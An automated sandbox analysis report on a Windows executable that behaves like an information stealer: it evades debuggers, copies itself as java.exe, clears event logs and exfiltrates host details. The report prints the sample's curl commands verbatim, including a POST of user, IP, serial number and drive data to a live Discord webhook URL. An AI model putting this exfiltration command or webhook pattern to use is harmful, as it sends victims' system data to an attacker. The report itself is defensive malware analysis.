Windows Analysis Report
Jx6bD8nM4qW9sL3v.exe

Overview

General Information

Sample name:Jx6bD8nM4qW9sL3v.exe
Analysis ID:1582327
MD5:e181eb699888d8bbbe0b89d41df77678
SHA1:9a500deadf901dfb3f63df1ab2cbc679b27fc660
SHA256:86c52e999cfd2243ea8e81e6ff8b1c6e15ee176807c7911d5a000341200eb757
Tags:exe, user-juroots

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to detect virtual machines
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Exploit detected, runtime environment starts unknown processes
Sigma detected: Suspicious Processes Spawned by Java.EXE
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Jx6bD8nM4qW9sL3v.exe (PID: 6052 cmdline: "C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe" MD5: E181EB699888D8BBBE0B89D41DF77678)
    • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 5776 cmdline: curl -s https://api.ipify.org MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • curl.exe (PID: 4196 cmdline: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • java.exe (PID: 6400 cmdline: C:\Users\user\AppData\Local\java.exe MD5: E181EB699888D8BBBE0B89D41DF77678)
    • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1812 cmdline: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 4144 cmdline: curl -s https://api.ipify.org MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • curl.exe (PID: 3128 cmdline: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Andreas Hunkeler (@Karneades), Florian Roth: Data: Command: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm, CommandLine: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Users\user\AppData\Local\java.exe, ParentImage: C:\Users\user\AppData\Local\java.exe, ParentProcessId: 6400, ParentProcessName: java.exe, ProcessCommandLine: curl -H "Content-Type: application/json" -X POST -d 
"{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm, ProcessId: 3128, ProcessName: curl.exe
Source: Process startedAuthor: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali: Data: Command: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, CommandLine: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\java.exe, ParentImage: C:\Users\user\AppData\Local\java.exe, ParentProcessId: 6400, ParentProcessName: java.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, ProcessId: 1812, ProcessName: cmd.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, CommandLine: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe", ParentImage: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe, ParentProcessId: 6052, ParentProcessName: Jx6bD8nM4qW9sL3v.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, ProcessId: 6604, ProcessName: cmd.exe
No Suricata rule has matched

AV Detection

Source: C:\Users\user\AppData\Local\java.exeReversingLabs: Detection: 47%
Source: Jx6bD8nM4qW9sL3v.exeReversingLabs: Detection: 47%
Source: Jx6bD8nM4qW9sL3v.exeVirustotal: Detection: 54%
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC6000 CryptStringToBinaryA,memset,CryptStringToBinaryA,_invalid_parameter_noinfo_noreturn,_CxxThrowException,_CxxThrowException,0_2_00007FF670FC6000
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F6000 CryptStringToBinaryA,memset,CryptStringToBinaryA,_invalid_parameter_noinfo_noreturn,_CxxThrowException,_CxxThrowException,6_2_00007FF65E1F6000
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC1780 GetLogicalDriveStringsA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,GetDriveTypeA,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF670FC1780

Software Vulnerabilities

Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\conhost.exe
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.83.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm HTTP/1.1Host: discord.comUser-Agent: curl/7.83.1Accept: */*Content-Type: application/jsonContent-Length: 483
Source: Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.se1
Source: Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTime
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Jx6bD8nM4qW9sL3v.exe, 00000000.00000002.2034490132.000002597BC07000.00000004.00000020.00020000.00000000.sdmp, Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootI
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: curl.exe, 00000009.00000002.2051339309.000002C6CC54A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmp, Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: https://api.ipify.org
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9637000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051214870.000002C6CC524000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051327029.000002C6CC528000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/Item
Source: java.exe, 00000006.00000002.2060240613.0000022751ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org2
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9648000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org7
Source: Jx6bD8nM4qW9sL3v.exe, 00000000.00000002.2034490132.000002597BC07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org9
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9648000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org?
Source: curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgL
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgWinsta0
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: https://api.ipify.orgcurl
Source: curl.exe, 00000009.00000003.2051214870.000002C6CC524000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051327029.000002C6CC528000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgvB
Source: curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgwinsta0
Source: java.exe, 00000006.00000002.2060240613.0000022751EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org~
Source: curl.exe, 00000005.00000002.2033796989.0000015BFD279000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2059642518.00000269500F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooK
Source: curl.exe, 0000000A.00000002.2059832303.00000269500E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC42B0 RtlAdjustPrivilege,NtRaiseHardError,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,GetConsoleWindow,GetSystemMenu,RemoveMenu,GetModuleFileNameW,GetFileAttributesW,SetFileAttributesW,GdiplusStartup,CoUninitialize,OpenEventLogW,ClearEventLogW,CloseEventLog,_invalid_parameter_noinfo_noreturn,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,0_2_00007FF670FC42B0
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC3FEA LoadLibraryA,GetProcAddress,FreeLibrary,GetCurrentProcess,NtQueryInformationProcess,FreeLibrary,0_2_00007FF670FC3FEA
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F3FEA LoadLibraryA,GetProcAddress,FreeLibrary,GetCurrentProcess,NtQueryInformationProcess,FreeLibrary,6_2_00007FF65E1F3FEA
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F42B0 RtlAdjustPrivilege,NtRaiseHardError,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,GetConsoleWindow,GetSystemMenu,RemoveMenu,GetModuleFileNameW,GetFileAttributesW,SetFileAttributesW,GdiplusStartup,CoUninitialize,OpenEventLogW,ClearEventLogW,CloseEventLog,_invalid_parameter_noinfo_noreturn,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,6_2_00007FF65E1F42B0
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess token adjusted: SecurityJump to behavior
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: invalid certificate
Source: classification engineClassification label: mal76.expl.evad.winEXE@16/4@2/3
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC3EC9 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,Process32NextW,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,0_2_00007FF670FC3EC9
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC4990 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize,0_2_00007FF670FC4990
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeFile created: C:\Users\user\AppData\Local\java.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Jx6bD8nM4qW9sL3v.exeReversingLabs: Detection: 47%
Source: Jx6bD8nM4qW9sL3v.exeVirustotal: Detection: 54%
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeFile read: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe "C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe"
